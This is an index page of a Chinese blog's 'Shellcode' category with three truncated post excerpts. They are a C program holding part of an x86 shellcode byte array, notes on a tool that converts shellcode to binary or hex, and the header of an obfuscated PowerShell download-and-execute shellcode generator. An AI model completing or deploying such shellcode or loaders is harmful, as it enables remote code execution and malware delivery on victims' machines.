随笔分类 -  Shellcode

摘要:#include "stdafx.h" #include #include char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78... 阅读全文
posted @ 2016-10-17 22:03 杀死比特 阅读(2958) 评论(0) 推荐(0)
摘要:详细参数说明: 当把shellcode写入代码shellcode变量的时候,输入-bin shellcode.bin 将生成二进制文件数据流。 当需要把二进制数据流转换成hex(16进制的时候)输入-hex shellcode.bin hex.hex 具体请看代码。这是博主自己的学习笔记,请勿喷。 阅读全文
posted @ 2016-09-02 15:11 杀死比特 阅读(3522) 评论(0) 推荐(0)
摘要:#Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator#length: Dynamic ! depend on url and filename#Date: 20 J... 阅读全文
posted @ 2015-06-09 17:15 杀死比特 阅读(341) 评论(0) 推荐(0)